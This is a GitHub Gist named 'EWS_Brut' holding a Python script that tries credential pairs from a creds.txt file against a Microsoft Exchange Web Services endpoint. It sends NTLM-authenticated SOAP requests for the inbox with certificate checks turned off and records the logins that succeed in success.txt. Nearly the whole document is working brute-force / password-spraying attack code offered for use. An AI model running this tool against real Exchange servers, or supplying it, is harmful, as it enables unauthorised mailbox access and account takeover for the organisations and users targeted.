Created
November 28, 2021 19:16
-
-
Save ffcommax/6fb92098718259a6b2120904bdeec3fc to your computer and use it in GitHub Desktop.
EWS_Brut
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #https://github.com/0x0021h/expbox | |
| #!/usr/bin/python | |
| import socket, time | |
| import http.client as httplib | |
| import requests | |
| import urllib | |
| import os, ssl | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
| import time | |
| import base64 | |
| target = "" | |
| def sendPayload(gadgetChain, USER, PASS): | |
| get_inbox = '''<?xml version="1.0" encoding="utf-8"?> | |
| <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> | |
| <soap:Header> | |
| <t:RequestServerVersion Version="Exchange2013" /> | |
| </soap:Header> | |
| <soap:Body> | |
| <m:GetFolder> | |
| <m:FolderShape> | |
| <t:BaseShape>AllProperties</t:BaseShape> | |
| </m:FolderShape> | |
| <m:FolderIds> | |
| <t:DistinguishedFolderId Id="inbox" /> | |
| </m:FolderIds> | |
| </m:GetFolder> | |
| </soap:Body> | |
| </soap:Envelope> | |
| ''' | |
| headers = {"User-Agent": "ExchangeServicesClient/15.01.2308.008", "Content-type": "text/xml; charset=utf-8"} | |
| # time.sleep(60) | |
| count = 0 | |
| file1 = open('creds.txt', 'r') | |
| Lines = file1.readlines() | |
| for line in Lines: | |
| # print(line.split(":")) | |
| USER = str(line.split(":")[0]).strip() | |
| PASS = str(line.split(":")[1]).strip() | |
| # print(USER) | |
| # print(PASS) | |
| res = requests.post(target + "/ews/exchange.asmx", | |
| data=get_inbox, | |
| headers=headers, | |
| verify=False, | |
| auth=HttpNtlmAuth('%s' % (USER), | |
| PASS)) | |
| print(USER+":"+PASS+"=>"+str(res.status_code)) | |
| if res.status_code == 200: | |
| file1 = open('success.txt', 'a') | |
| file1.write(str(USER) + ":" + str(PASS) + "\n") | |
| file1.close() | |
| sendPayload("", "", "") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment